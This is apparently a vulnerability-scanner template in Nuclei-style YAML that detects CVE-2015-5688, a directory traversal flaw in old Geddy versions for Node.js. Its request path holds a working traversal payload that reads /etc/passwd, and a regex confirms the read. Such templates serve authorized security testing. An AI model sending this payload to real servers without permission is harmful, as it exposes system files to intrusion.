30 lines
849 B
YAML
30 lines
849 B
YAML
id: CVE-2015-5688
|
|
|
|
info:
|
|
name: Geddy before v13.0.8 LFI
|
|
author: pikpikcu
|
|
severity: high
|
|
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
|
|
reference:
|
|
- https://nodesecurity.io/advisories/geddy-directory-traversal
|
|
- https://github.com/geddy/geddy/issues/697
|
|
classification:
|
|
cve-id: CVE-2015-5688
|
|
tags: cve,cve2015,geddy,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|